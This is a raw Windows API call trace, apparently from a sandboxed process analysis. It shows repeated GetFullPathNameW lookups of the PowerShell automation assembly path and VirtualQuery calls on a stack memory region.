	[0397.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.044] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.044] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.045] VirtualQuery (in: lpAddress=0x16b4f0, lpBuffer=0x16c3b0, dwLength=0x30 | out: lpBuffer=0x16c3b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.045] VirtualQuery (in: lpAddress=0x16b580, lpBuffer=0x16c440, dwLength=0x30 | out: lpBuffer=0x16c440*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.047] VirtualQuery (in: lpAddress=0x16bf90, lpBuffer=0x16ce50, dwLength=0x30 | out: lpBuffer=0x16ce50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] VirtualQuery (in: lpAddress=0x16bf90, lpBuffer=0x16ce50, dwLength=0x30 | out: lpBuffer=0x16ce50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.051] VirtualQuery (in: lpAddress=0x16bf90, lpBuffer=0x16ce50, dwLength=0x30 | out: lpBuffer=0x16ce50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.051] VirtualQuery (in: lpAddress=0x16bf90, lpBuffer=0x16ce50, dwLength=0x30 | out: lpBuffer=0x16ce50*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0397.052] VirtualQuery (in: lpAddress=0x16b680, lpBuffer=0x16c540, dwLength=0x30 | out: lpBuffer=0x16c540*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.052] VirtualQuery (in: lpAddress=0x16b710, lpBuffer=0x16c5d0, dwLength=0x30 | out: lpBuffer=0x16c5d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.052] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.052] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0397.067] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
